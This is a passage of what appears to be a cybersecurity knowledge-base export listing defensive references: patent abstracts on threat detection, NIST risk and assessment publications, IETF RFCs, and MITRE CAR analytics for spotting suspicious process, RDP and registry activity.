  • "In embodiments of the present invention improved capabilities are described for detecting restricted content associated with retrieved content. The method and system may include receiving a client request for content, saving contextual information from the client request, presenting retrieved content in response to the client request, and presenting the contextual information from the client request, and retrieved content, to a scanning facility. The scanning facility may utilize the contextual information from the client request to aid in the detection of restricted content associated with retrieved content."

kb-author

  • "Fraser Howard; Paul Baccas; Vanja Svajcer; Benjamin John Godwood; William James McCourt"

kb-mitre-analysis

  • "This patent describes analyzing contextual information of a Uniform Resource Identifier (URI), such as source or origin of the request URI, patterns in the way the URI is delivered, and the locale of the URI. The contextual information is sent to a scanning facility which uses that information along with a blacklist of known malicious domain names, locations, patterns, etc. to block retrieved content associated with the request URI."

kb-organization

  • "Sophos Ltd"

rdfs:label

  • "Reference - Method and system for detecting restricted content associated with retrieved content - Sophos Ltd"

kb-reference-of

kb-reference-title

  • "Method and system for detecting restricted content associated with retrieved content"

Usage (5)

kb-abstract

  • "Disclosed is an improved approach for identifying suspicious administrative host activity within a network. Network traffic is examined to learn the behavior of hosts within a network. This provides an effective way of determining whether or not a host is performing suspicious activity over an administrative protocol."

kb-author

  • "Nicolas Beauchesne; Kevin Song-Kai Ni"

kb-mitre-analysis

  • "Collect network traffic metadata directed at administrative services over a period of time to establish a baseline. This baseline is then used to determine suspicious activity that falls outside of the established baseline."

kb-organization

  • "Vectra Networks Inc"

rdfs:label

  • "Reference - Method and system for detecting suspicious administrative activity - Vectra Networks Inc"

kb-reference-of

kb-reference-title

  • "Method and system for detecting suspicious administrative activity"

Usage (5)

kb-abstract

  • "An approach for detecting network attacks using metadata vectors may initially involve receiving network communications or packets, extracting metadata items from the packets. The metadata items describe the communications without requiring deep content inspection of the data payload or contents. The communications may be clustered into groups using the metadata items. If a cluster exceeds a threshold, an alarm may be generated."

kb-author

  • "Nicolas BEAUCHESNE; David Lopes Pegna; Karl Lynn"

kb-mitre-analysis

  • "This patent describes detecting network threats by first passively collecting network traffic and storing it for processing. Metadata from network traffic such as packet header information or information about a session (ex. time between request/responses) is extracted. After the metadata is extracted, the data is grouped into cluster maps of matching events to track how many instances of a network communication have occurred, such as five requests sent and five responses received. Threshold limits are set on the clusters to monitor them and if a cluster grows too large (ex. ten instances of requests and responses) this can correspond to unauthorized behavior. This method might detect, for example, a network attack using malicious payloads with automated scripts, in which a bot sends replicated malicious payloads to the same destination port."

kb-organization

  • "VECTRA NETWORKS Inc"

rdfs:label

  • "Reference - Method and system for detecting threats using metadata vectors - VECTRA NETWORKS Inc"

kb-reference-of

kb-reference-title

  • "Method and system for detecting threats using metadata vectors"

Usage (5)

kb-abstract

  • "An approach for detecting network threats is disclosed, that may involve receiving network traffic, plotting the network traffic in a n-dimensional feature space to form a network map, generating a client signature at least by placing new client points in the map, setting a threshold, and generating an alarm if one or more client activity points exceed the threshold. In some embodiments, the network map and the client signature are updated using sliding windows and distance calculations."

kb-author

  • "David Lopes PEGNA; Nicolas Beauchesne"

kb-mitre-analysis

  • "This patent describes detecting network threats by first passively collecting network traffic and storing it for processing. The stored network traffic data is used to map network events to create a cluster map. Events are network activity associated with clients, servers, or control modules such as a Kerberos Domain Controller (KDC); account information; services accessed by the client; or the number of times a service is accessed. Events that exceed a threshold from a center of gravity point of a cluster are identified as suspicious activity and an alert is generated."

kb-organization

  • "Vectra Networks Inc"

rdfs:label

  • "Reference - Method and system for detecting threats using passive cluster mapping - Vectra Networks Inc"

kb-reference-of

kb-reference-title

  • "Method and system for detecting threats using passive cluster mapping"

Usage (5)

kb-abstract

  • "A method of operating a security system for a computer network in which data is passed in said network as data packets, said system controlling the passage of said data packets in the network according to a security rule, where each aspect of said network controlled by said security rule has been defined, said security rule has been defined in terms of said aspects and converted into a set of filter language instructions."

kb-author

  • "Gil Shwed"

kb-mitre-analysis

  • ""

kb-organization

  • "Checkpoint Software Technologies Ltd"

rdfs:label

  • "Reference - Method for controlling computer network security - Checkpoint Software Technologies Ltd"

kb-reference-of

kb-reference-title

  • "Method for controlling computer network security"

Usage (5)

kb-abstract

  • "A user mode application component invokes the assistance of a kernel mode driver component to detect and/or remediate malicious code on a computer system. The user mode application may include code that detects, for example, spyware and computer viruses, from user mode and when appropriate takes protective action when malicious code is detected. In one aspect, when the user mode application is unable to perform a selected operation in attempting to detect and/or take protective action, the user mode application invokes a kernel mode driver for assistance. The kernel mode driver assists user mode application in detecting malicious code and/or taking protective action by enabling or otherwise performing a selected operation for the user mode application."

kb-author

  • "Adam Glick, Patrick Gardner, Pieter Viljoen"

kb-mitre-analysis

  • "This patent describes detecting registry changes using a prohibited change heuristic or a database of prohibited functions/function parameters."

kb-organization

  • "Symantec Corporation"

rdfs:label

  • "Reference - Method using kernel mode assistance for the detection and removal of threats which are actively preventing detection and removal from a running system - Symantec Corporation"

kb-reference-of

kb-reference-title

  • "Method using kernel mode assistance for the detection and removal of threats which are actively preventing detection and removal from a running system"

Usage (5)

kb-abstract

  • "This paper describes a hierarchical graph-based model that captures mission dependencies at various levels of abstraction, showing interdependencies among mission objectives, tasks, information, and cyber assets. For this work, we employ established tools within a structured methodology for cyber resiliency analysis. Our model is focused on a strategic-level military scenario defined in a formal Request for Information (RFI) to industry and research partners by the NATO Multinational Cyber Defense Capability Development (MN CD2) Work Package 2 (WP2). We enhance this scenario with additional mission and operational context, and then build a mission dependency model for the enhanced scenario. It is anticipated that our mission dependency model will be part of an upcoming demonstration of cyber defense situational awareness capabilities in a NATO Communications and Information (NCI) Agency test environment, integrated with data sources that represent the operational military environment."

kb-author

  • "William Heinbockel, Steven Noel, James Curbo"

kb-organization

  • "JHU APL"

rdfs:label

  • "Reference - Mission Dependency Modeling for Cyber Situational Awareness"

kb-reference-of

kb-reference-title

  • "Mission Dependency Modeling for Cyber Situational Awareness"

Usage (5)

kb-abstract

  • "A training system senses a user action that may expose the user to a threat, such as a cybersecurity threat. The user action may be in response to a mock attack delivered via a messaging service, a wireless communication service, a fake malware application or another device, service, system or mechanism. The system selects a training action from a collection of available training actions and causes the training action to be delivered to the user."

kb-author

  • "Norman Sadeh-Koniecpol, Kurt Wescoe, Jason Brubaker, Jason Hong"

kb-mitre-analysis

  • ""

kb-organization

  • "WOMBAT SECURITY TECHNOLOGIES Inc"

rdfs:label

  • "Reference - Mock attack cybersecurity training system and methods - WOMBAT SECURITY TECHNOLOGIES Inc"

kb-reference-of

kb-reference-title

  • "Mock attack cybersecurity training system and methods"

Usage (5)

kb-abstract

  • "Embodiments of the invention provide a method for detecting changes in behavior of authorized users of computer resources and reporting the detected changes to the relevant individuals. The method includes evaluating actions performed by each user against user behavioral models and business rules. As a result of the analysis, a subset of users may be identified and reported as having unusual or suspicious behavior. In response, the management may provide feedback indicating that the user behavior is due to the normal expected business needs or that the behavior warrants further review. The management feedback is available for use by machine learning algorithms to improve the analysis of user actions over time. Consequently, investigation of user actions regarding computer resources is facilitated and data loss is prevented more efficiently relative to the prior art approaches with only minimal disruption to the ongoing business processes."

kb-author

  • "Joseph P. Bigus, Leon Gong, Christoph Lingenfelder"

kb-mitre-analysis

  • ""

kb-organization

  • "Daedalus Group LLC (formerly IBM)"

rdfs:label

  • "Reference - Modeling user access to computer resources - Daedalus Group LLC (formerly IBM)"

kb-reference-of

kb-reference-title

  • "Modeling user access to computer resources"

Usage (5)

kb-abstract

  • "Provided are devices, computer-program products, and methods (e.g., methods implemented by a production system or security agent program or process) for providing services on a production system to mimic a deception mechanism. For example, a method can include determining a deception characteristic of a deception mechanism and determining a production characteristic of the production system. The method can further include determining an additional service or a modification of an existing service of the production system using the deception characteristic and the production characteristic. In some cases, the additional service and/or the modification can be a deterrent to potential attackers of the production system. The method can further include modifying the production system to mimic the deception mechanism, including adding the additional service to the production system or modifying the existing service using the modification."

kb-author

  • "Sreenivas Gukal, Rammohan Varadarajan"

kb-mitre-analysis

  • ""

kb-organization

  • "Acalvio Technologies Inc"

rdfs:label

  • "Reference - Modification of a Server to Mimic a Deception Mechanism - Acalvio Technologies Inc"

kb-reference-of

kb-reference-title

  • "Modification of a Server to Mimic a Deception Mechanism"

Usage (5)

kb-abstract

  • "Once security and privacy controls are implemented, they need to be evaluated for correctness and effectiveness. After the initial assessment is completed and the system enters the operations/maintenance phase of the system development life cycle, the controls are assessed on an ongoing basis according to the organization and system’s continuous monitoring plans. The ongoing assessment supports the authorizing official’s decision to continue or discontinue the system’s authorization to operate. Control effectiveness assessments are performed by an independent third-party assessor or assessment team if the system categorization is moderate or high."

kb-organization

  • "NIST"

rdfs:label

  • "Reference - NIST RMF Quick Start Guide - Assess Step - Frequently Asked Questions (FAQ)"

kb-reference-of

kb-reference-title

  • "NIST RMF Quick Start Guide - Assess Step - Frequently Asked Questions (FAQ)"

Usage (5)

kb-abstract

  • "With the continuing frequency, intensity, and adverse consequences of cyber-attacks, disruptions, hazards, and other threats to federal, state, and local governments, the military, businesses, and the critical infrastructure, the need for trustworthy secure systems has never been more important to the long-term economic and national security interests of the United States. Engineering-based solutions are essential to managing the growing complexity, dynamicity, and interconnectedness of today’s systems, as exemplified by cyber-physical systems and systems-of-systems, including the Internet of Things. This publication addresses the engineering-driven perspective and actions necessary to develop more defensible and survivable systems, inclusive of the machine, physical, and human components that compose the systems and the capabilities and services delivered by those systems. It starts with and builds upon a set of well-established International Standards for systems and software engineering published by the International Organization for Standardization (ISO), the International Electrotechnical Commission (IEC), and the Institute of Electrical and Electronics Engineers (IEEE) and infuses systems security engineering methods, practices, and techniques into those systems and software engineering activities. The objective is to address security issues from a stakeholder protection needs, concerns, and requirements perspective and to use established engineering processes to ensure that such needs, concerns, and requirements are addressed with appropriate fidelity and rigor, early and in a sustainable manner throughout the life cycle of the system."

kb-author

  • "Ron Ross, Michael McEvilley, and Janet Carrier Oren"

kb-organization

  • "NIST"

rdfs:label

  • "Reference - NIST Special Publication 800-160 Volume 1 - System Security Engineering"

kb-reference-of

kb-reference-title

  • "NIST Special Publication 800-160 Volume 1 - Systems Security Engineering"

Usage (5)

kb-abstract

  • "This publication describes the Risk Management Framework (RMF) and provides guidelines for applying the RMF to information systems and organizations. The RMF provides a disciplined, structured, and flexible process for managing security and privacy risk that includes information security categorization; control selection, implementation, and assessment; system and common control authorizations; and continuous monitoring. The RMF includes activities to prepare organizations to execute the framework at appropriate risk management levels. The RMF also promotes near real-time risk management and ongoing information system and common control authorization through the implementation of continuous monitoring processes; provides senior leaders and executives with the necessary information to make efficient, cost-effective, risk management decisions about the systems supporting their missions and business functions; and incorporates security and privacy into the system development life cycle. Executing the RMF tasks links essential risk management processes at the system level to risk management processes at the organization level. In addition, it establishes responsibility and accountability for the controls implemented within an organization’s information systems and inherited by those systems."

kb-organization

  • "NIST"

rdfs:label

  • "Reference - NIST Special Publication 800-37 Revision 2 - Risk Management Framework for Information Systems and Organizations"

kb-reference-of

kb-reference-title

  • "NIST Special Publication 800-37 Revision 2 - Risk Management Framework for Information Systems and Organizations"

Usage (5)

kb-abstract

  • "This publication provides a methodology and set of procedures for conducting assessments of security and privacy controls employed within systems and organizations within an effective risk management framework. The assessment procedures, executed at various phases of the system development life cycle, are consistent with the security and privacy controls in NIST Special Publication 800-53, Revision 5. The procedures are customizable and can be easily tailored to provide organizations with the needed flexibility to conduct security and privacy control assessments that support organizational risk management processes and are aligned with the stated risk tolerance of the organization. Information on building effective security and privacy assessment plans is also provided with guidance on analyzing assessment results."

kb-organization

  • "NIST"

rdfs:label

  • "Reference - NIST Special Publication 800-53A Revision 5 - Assessing Security and Privacy Controls in Information Systems and Organizations"

kb-reference-of

kb-reference-title

  • "NIST Special Publication 800-53A Revision 5 - Assessing Security and Privacy Controls in Information Systems and Organizations"

Usage (5)

kb-abstract

  • "This volume introduces concepts to support automated assessment of most of the security controls in NIST Special Publication (SP) 800-53. Referencing SP 800-53A, the controls are divided into more granular parts (determination statements) to be assessed. The parts of the control assessed by each determination statement are called control items. The control items are then grouped into the appropriate security capabilities. As suggested by SP 800-53 Revision 4, security capabilities are groups of controls that support a common purpose. For effective automated assessment, testable defect checks are defined that bridge the determination statements to the broader security capabilities to be achieved and to the SP 800-53 security control items themselves. The defect checks correspond to security sub-capabilities—called sub-capabilities because each is part of a larger capability. Capabilities and sub-capabilities are both designed with the purpose of addressing a series of attack steps. Automated assessments (in the form of defect checks) are performed using the test assessment method defined in SP 800-53A by comparing a desired and actual state (or behavior)."

kb-author

  • "Kelley Dempsey, Paul Eavy, and George Moore"

kb-organization

  • "NIST"

rdfs:label

  • "Reference - NISTIR 8011 Volume 1 - Automation Support for Security Control Assessments"

kb-reference-of

kb-reference-title

  • "NIST Interagency Report 8011 Volume 1 - Automation Support for Security Control Assessments"

Usage (5)

kb-abstract

  • "Buffer overflow attacks continue to be a major security problem and detecting attacks of this nature
    is therefore crucial to network security. Signature based network based intrusion detection systems (NIDS)
    compare network traffic to signatures modelling suspicious or attack traffic to detect network attacks. Since
    detection is based on pattern matching, a signature modelling the attack must exist for the NIDS to detect it, and
    it is therefore only capable of detecting known attacks. This paper proposes a method to detect buffer overflow
    attacks by parsing the payload of network packets in search of shellcode which is the remotely executable
    component of a buffer overflow attack. By analysing the shellcode it is possible to determine which system
    calls the exploit uses, and hence the operation of the exploit. Current NIDS-based buffer overflow detection
    techniques mainly rely upon specific signatures for each new attack. Our approach is able to detect previously
    unseen buffer overflow attacks, in addition to existing ones, without the need for specific signatures for each
    new attack. The method has been implemented and tested for buffer overflow attacks on Linux on the Intel x86
    architecture using the Snort NIDS."

kb-author

  • "Stig Andersson, Andrew Clark, and George Mohay"

kb-mitre-analysis

  • ""

kb-organization

  • "Information Security Research Centre"

rdfs:label

  • "Reference - Network-Based Buffer Overflow Detection by Exploit Code Analysis - Information Security Research Centre"

kb-reference-of

kb-reference-title

  • "Network-Based Buffer Overflow Detection by Exploit Code Analysis"

Usage (5)

kb-abstract

  • "A proxy which is part of a firewall controls exchanges of information between two application entities. The proxy interrogates attempts to establish a communication session by requesting entities with a server entity in lower layers in accordance with defined authentication procedures. The Proxy interfaces with networking software to direct a communication stack to monitor connection requests to any address on specific ports. The requestor's address, and the server's address are checked against a access control list. If either address is invalid, the proxy closes the connection. If both are valid, a new connection is setup such that both the requestor and server are transparently connected to the proxy with variable higher levels being connected in a relay mode. Protocol data units are interrogated for conformance to a protocol session, and optionally further decoded to add additional application specific filtering. In one embodiment, an OSI architecture comprises the levels."

kb-author

  • "Michael W Green, Ricky Ronald Kruse"

kb-mitre-analysis

  • ""

kb-organization

  • "Secure Computing LLC"

rdfs:label

  • "Reference - Network firewall with proxy - Secure Computing LLC"

kb-reference-of

kb-reference-title

  • "Network firewall with proxy"

Usage (5)

kb-abstract

  • "A system to detect attackers who attempt to breach an enterprise network and attackers who have already breached the enterprise network, including an open source intelligence (OSINT) discoverer scanning the Internet to discover data related to an enterprise that is available online, an OSINT replacer generating deceptive files by replacing placeholders within template files with deceptive information, based on the data discovered by the OSINT discoverer, an OSINT distributor planting the deceptive files generated by the OSINT replacer within designated OSINT resources, and a deception management server that alerts an administrator in response to an attacker attempting to make a connection within the network using information in a deceptive file planted by the OSINT distributor."

kb-author

  • "Hadar Yudovich; Nimrod Lavi; Sharon Bittan; Tom Kahana; Tom Sela"

kb-mitre-analysis

  • "Seems to focus on configuration oriented files to put in decoy hostnames etc. to publish on internet sites, then monitor the decoy "objects"."

kb-organization

  • "Illusive Networks Ltd"

rdfs:label

  • "Reference - Open source intelligence deceptions - Illusive Networks Ltd"

kb-reference-of

kb-reference-title

  • "Open source intelligence deceptions"

Usage (5)

kb-author

  • "Soham Ray"

kb-organization

  • "SAP Press"

rdfs:label

  • "Reference - Organizational Management in SAP ERP HCM"

kb-reference-of

kb-reference-title

  • "Organization Mapping in SAP ERP HCM"

Usage (5)

kb-abstract

  • "Many programs create command prompts as part of their normal operation including malware used by attackers. This analytic attempts to identify suspicious programs spawning cmd.exe by looking for programs that do not normally create cmd.exe.

    While this analytic does not take the user into account, doing so could generate further interesting results. It is very common for some programs to spawn cmd.exe as a subprocess, for example to run batch files or windows commands. However many process don't routinely launch a command prompt - for example Microsoft Outlook. A command prompt being launched from a process that normally doesn't launch command prompts could be the result of malicious code being injected into that process, or of an attacker replacing a legitimate program with a malicious one."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2014-11-002: Outlier Parents of Cmd - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2014-11-002: Outlier Parents of Cmd"

Usage (5)

kb-abstract

  • "This document provides technical guidelines and recommendations supporting resiliency of platform firmware and data against potentially destructive attacks. The platform is a collection of fundamental hardware and firmware components needed to boot and operate a system. A successful attack on platform firmware could render a system inoperable, perhaps permanently, or requiring reprogramming by the original manufacturer, resulting in significant disruptions to users. The technical guidelines in this document promote resiliency in the platform by describing security mechanisms for protecting the platform against unauthorized changes, detecting unauthorized changes that occur, and recovering from attacks rapidly and securely. Implementers, including Original Equipment Manufacturers (OEMs) and component/device suppliers, can use these guidelines to build stronger security mechanisms into platforms. System administrators, security professionals, and users can use this document to guide procurement strategies and priorities for future systems."

kb-author

  • "NIST"

kb-mitre-analysis

  • ""

kb-organization

  • "NIST"

rdfs:label

  • "Reference - Platform Firmware Resiliency Guidelines - NIST"

kb-reference-of

kb-reference-title

  • "Platform Firmware Resiliency Guidelines"

Usage (5)

kb-abstract

  • "In one aspect, a method useful for monitoring and validating execution of executable binary code, includes the step of disassembling an executable binary code of an application. The method includes the step of detecting and obtaining location and type of an application programming interface (API) call, system call, and privileged instruction that is executed by the executable binary code. The method includes the step of detecting and obtaining return address from an Al call and system call. The method includes the step of validating location of the API call system call, and privileged instruction. The method includes the step of validating return from the API call and system call."

kb-author

  • "Jayant Shukla"

kb-mitre-analysis

  • "The patent describes a technique for monitoring API calls. Executable binary code of an application is first disassembled and scanned for API calls. Based on the recorded API calls, a rule list is generated. Software hooks are placed in the code for monitoring API calls during program execution and then each API call is validated using the generated rule list to permit or deny execution of API calls.

    Rules are created that specify the type and location of the API call. For example, data collected for an application can show an API call to libc at address 0x43e0 and an API call by libc at address 0xlfb47. Accordingly, two rules are generated. The first rule specifies the location type and target of the API call at address 0x43e0, as well as the return address. The second rule is for the API call to the kernel and states the target address, return address, instruction, and target type."

kb-organization

  • "K2 Cyber Security Inc"

rdfs:label

  • "Reference - Post sandbox methods and systems for detecting and blocking zero-day exploits via api call validation - K2 Cyber Security Inc"

kb-reference-of

kb-reference-title

  • "Post sandbox methods and systems for detecting and blocking zero-day exploits via api call validation"

Usage (5)

kb-abstract

  • "PowerShell is a scripting environment included with Windows that is used by both attackers and administrators. Execution of PowerShell scripts in most Windows versions is opaque and not typically secured by antivirus which makes using PowerShell an easy way to circumvent security measures. This analytic detects execution of PowerShell scripts.

    Powershell can be used to hide monitored command line execution such as:

    * net use
    * sc start"

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2014-04-003: Powershell Execution - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2014-04-003: Powershell Execution"

Usage (5)

kb-abstract

  • "Various families of malware use domain generation algorithms (DGAs) to generate a large number of pseudo-random domain names to connect to a command and control (C&C) server. In order to block DGA C&C traffic, security organizations must first discover the algorithm by reverse engineering malware samples, then generating a list of domains for a given seed. The domains are then either preregistered or published in a DNS blacklist. This process is not only tedious, but can be readily circumvented by malware authors using a large number of seeds in algorithms with multivariate recurrence properties (e.g., banjori) or by using a dynamic list of seeds (e.g., bedep). Another technique to stop malware from using DGAs is to intercept DNS queries on a network and predict whether domains are DGA generated. Such a technique will alert network administrators to the presence of malware on their networks. In addition, if the predictor can also accurately predict the family of DGAs, then network administrators can also be alerted to the type of malware that is on their networks. This paper presents a DGA classifier that leverages long short-term memory (LSTM) networks to predict DGAs and their respective families without the need for a priori feature extraction. Results are significantly better than state-of-the-art techniques, providing 0.9993 area under the receiver operating characteristic curve for binary classification and a micro-averaged F1 score of 0.9906. In other terms, the LSTM technique can provide a 90% detection rate with a 1:10000 false positive (FP) rate---a twenty times FP improvement over comparable methods. Experiments in this paper are run on open datasets and code snippets are provided to reproduce the results."

kb-author

  • "Jonathan Woodbridge, Hyrum S. Anderson, Anjum Ahuja, Daniel Grant"

kb-mitre-analysis

  • ""

kb-organization

  • ""

rdfs:label

  • "Reference - Predicting Domain Generation Algorithms with Long Short-Term Memory Networks"

kb-reference-of

kb-reference-title

  • "Predicting Domain Generation Algorithms with Long Short-Term Memory Networks"

Usage (5)

kb-abstract

  • "A method for preventing malware attacks includes the steps of detecting an attempt on an electronic device to access a task scheduler, determining an entity associated with the attempt to access the task scheduler, determining a malware status of the entity, and, based on the malware status of the entity, allowing or denying the attempted access to the task scheduler. The task scheduler is configured to launch one or more applications at a specified time or interval."

kb-author

  • "Anil Ramabhatta, Harinath Vishwanath Ramachetty, Nandi Dharma Kishore"

kb-mitre-analysis

  • "Access to a job scheduler is intercepted using hooking or file filters to identify and analyze the source files, processes, destination files, or destination servers associated with a scheduled job. The identified servers or files associated with a job are compared against an anti-malware signature database or reputation server to determine if it there is a match. If so, execution is denied and an alert is generated."

kb-organization

  • "McAfee LLC"

rdfs:label

  • "Reference - Preventing execution of task scheduled malware - McAfee LLC"

kb-reference-of

kb-reference-title

  • "Preventing execution of task scheduled malware"

Usage (5)

kb-abstract

  • "In one embodiment, a method includes obtaining addresses of end hosts at a switch, the switch configured with a primary virtual local area network and a secondary virtual local area network, creating a private virtual local area network access list comprising the addresses of end hosts permitted to communicate on the secondary virtual local area network, and applying the private virtual local area network access list to interfaces connected to the end hosts permitted to communicate on the secondary virtual local area network. An apparatus is also disclosed."

kb-author

  • "Anuraag Mittal, Huei-Ping Chen"

kb-organization

  • "Cisco Technology Inc"

rdfs:label

  • "Reference - Private virtual local area network isolation - Cisco Technology Inc"

kb-reference-of

kb-reference-title

  • "Private virtual local area network isolation"

Usage (5)

kb-abstract

  • "The Windows Command Prompt (cmd.exe) is a utility that provides a command line interface to Windows operating systems. It provides the ability to run additional programs and also has several built-in commands such as dir, copy, mkdir, and type, as well as batch scripts (.bat). Typically, when a user runs a command prompt, the parent process is explorer.exe or another instance of the prompt. There may be automated programs, logon scripts, or administrative tools that launch instances of the command prompt in order to run scripts or other built-in commands. Spawning the process cmd.exe from certain parents may be more indicative of malice. For example, if Adobe Reader or Outlook launches a command shell, this may suggest that a malicious document has been loaded and should be investigated. Thus, by looking for abnormal parent processes of cmd.exe, it may be possible to detect adversaries."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2013-02-003: Processes Spawning cmd.exe - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2013-02-003: Processes Spawning cmd.exe"

Usage (5)

kb-abstract

  • "A method of establishing a protected environment within a computing device including validating a kernel component loaded into a kernel of the computing device, establishing a security state for the kernel based on the validation, creating a secure process and loading a software component into the secure process, periodically checking the security state of the kernel, and notifying the secure process when the security state of the kernel has changed."

kb-author

  • "Sumedh Barde, Jonathan Schwartz, Reid Kuhn, Alexandre Grigorovitch, Kirt Debique, Chadd Knowlton, James Alkove, Geoffrey Dunbar, Michael Grier, Ming Ma, Chaitanya Upadhyay, Adil Sherwani, Arun Kishan"

kb-mitre-analysis

  • ""

kb-organization

  • "Microsoft Technology Licensing LLC"

rdfs:label

  • "Reference - Protected computing environment - Microsoft Technology Licensing LLC"

kb-reference-of

kb-reference-title

  • "Protected computing environment"

Usage (5)

kb-abstract

  • "Qualys Passive Scanning Sensor (PS) continuously monitors all network traffic and flags any asset activity. It identifies and profiles devices the moment they connect to the network, including those difficult to scan, corporate owned, brought by employees, and rogue IT. The data is sent immediately to the Qualys Cloud Platform for centralized analysis."

kb-organization

  • "Qualys"

rdfs:label

  • "Reference - Qualys Network Passive Sensor Getting Started Guide"

kb-reference-of

kb-reference-title

  • "Qualys Network Passive Sensor Getting Started Guide"

Usage (5)

kb-abstract

  • "Certain commands are frequently used by malicious actors and infrequently used by normal users. By looking for execution of these commands in short periods of time, we can not only see when a malicious user was on the system but also get an idea of what they were doing."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2013-04-002: Quick execution of a series of suspicious commands - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2013-04-002: Quick execution of a series of suspicious commands"

Usage (5)

kb-abstract

  • "The Remote Desktop Protocol (RDP), built in to Microsoft operating systems, allows a user to remotely log in to the desktop of another host. It allows for interactive access of the running windows, and forwards key presses, mouse clicks, etc. Network administrators, power users, and end-users may use RDP for day-to-day operations. From an adversary's perspective, RDP provides a means to laterally move to a new host. Determining which RDP connections correspond to adversary activity can be a difficult problem in highly dynamic environments, but will be useful in identifying the scope of a compromise."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2013-07-002: RDP Connection Detection - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2013-07-002: RDP Connection Detection"

Usage (5)

kb-author

  • "D. Harrington, R. Presuhn, B. Wijnen"

kb-organization

  • "Internet Engineering Task Force (IETF)"

rdfs:label

  • "Reference - An Architecture for Describing Simple Network Management Protocol (SNMP) Management Frameworks"

kb-reference-of

kb-reference-title

  • "An Architecture for Describing Simple Network Management Protocol (SNMP) Management Frameworks"

Usage (5)

kb-abstract

  • "The System for Cross-domain Identity Management (SCIM) specification is designed to manage user identity in cloud-based applications and services in a standardized way to enable interoperability, security, and scalability. The specification suite seeks to build upon experience with existing schemas and deployments, placing specific emphasis on simplicity of development and integration, while applying existing authentication, authorization, and privacy models. The intent of the SCIM specification is to reduce the cost and complexity of user management operations by providing a common user schema and extension model, as well as binding documents to provide patterns for exchanging this schema using standard protocols. In essence, make it fast, cheap, and easy to move users in to, out of, and around the cloud."

kb-author

  • "K. LI, B. Khasnabish, A. Nadalin, Z. Zeltsan"

kb-organization

  • "IETF"

rdfs:label

  • "Reference - RFC 7642: System for Cross-domain Identity Management: Definitions, Overview, Concepts, and Requirements"

kb-reference-of

kb-reference-title

  • "RFC7642: System for Cross-domain Identity Management: Definitions, Overview, Concepts, and Requirements"

Usage (5)

kb-abstract

  • "A service proxy is described herein. The service proxy is configured to act as an intermediary between a client and a service. The service proxy may observe communications, modify communications, log communications, or the like, particularly so as to enhance the security and reliability of the host device. In some implementations, the service proxy may cooperate with an operating system to take over a named port object. In some implementations, the service proxy may receive messages as an intermediary between the client and the server. In some implementations, the service proxy may attach to a shared memory to intercept communications. In some implementations, the service proxy may be injected into a client process to appear to be the client itself."

kb-author

  • "Ion-Alexandru Ionescu"

kb-mitre-analysis

  • ""

kb-organization

  • "Crowdstrike Inc"

rdfs:label

  • "Reference - RPC call interception - Crowdstrike Inc"

kb-reference-of

kb-reference-title

  • "RPC call interception"

Usage (5)

kb-abstract

  • "Registry modifications are often essential in establishing persistence via known Windows mechanisms. Many legitimate modifications are done graphically via regedit.exe or by using the corresponding channels, or even calling the Registry APIs directly. The built-in utility reg.exe provides a command-line interface to the registry, so that queries and modifications can be performed from a shell, such as cmd.exe. When a user is responsible for these actions, the parent of cmd.exe will likely be explorer.exe. Occasionally, power users and administrators write scripts that do this behavior as well, but likely from a different process tree. These background scripts must be learned so they can be tuned out accordingly."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2013-03-001: Reg.exe called from Command Shell - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2013-03-001: Reg.exe called from Command Shell"

Usage (5)

kb-abstract

  • "A remote desktop logon, through RDP, may be typical of a system administrator or IT support, but only from select workstations. Monitoring remote desktop logons and comparing to known/approved originating systems can detect lateral movement of an adversary."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2016-04-005: Remote Desktop Logon - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2016-04-005: Remote Desktop Logon"

Usage (5)

kb-abstract

  • "An adversary can remotely manipulate the registry of another machine if the RemoteRegistry service is enabled and valid credentials are obtained. While the registry is remotely accessed, it can be used to prepare a Lateral Movement technique, discover the configuration of a host, achieve Persistence, or anything that aids an adversary in achieving the mission. Like most ATT&CK techniques, this behavior can be used legitimately, and the reliability of an analytic depends on the proper identification of the pre-existing legitimate behaviors. Although this behavior is disabled in many Windows configurations, it is possible to remotely enable the RemoteRegistry service, which can be detected with CAR-2014-03-005.

    Remote access to the registry can be achieved via

    * Windows API function RegConnectRegistry
    * command line via reg.exe
    * graphically via regedit.exe

    All of these behaviors call into the Windows API, which uses the NamedPipe WINREG over SMB to handle the protocol information. This network can be decoded with wireshark or a similar sensor, and can also be detected by hooking the API function."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2014-11-005: Remote Registry - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2014-11-005: Remote Registry"

Usage (5)

kb-abstract

  • "There are several ways to cause code to execute on a remote host. One of the most common methods is via the Windows Service Control Manager (SCM), which allows authorized users to remotely create and modify services. Several tools, such as PsExec, use this functionality.

    When a client remotely communicates with the Service Control Manager, there are two observable behaviors. First, the client connects to the RPC Endpoint Mapper over 135/tcp. This handles authentication, and tells the client what port the endpoint--in this case the SCM--is listening on. Then, the client connects directly to the listening port on services.exe. If the request is to start an existing service with a known command line, the the SCM process will run the corresponding command.

    This compound behavior can be detected by looking for services.exe receiving a network connection and immediately spawning a child process."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2014-03-005: Remotely Launched Executables via Services - MITRE"

kb-reference-of

kb-reference-title

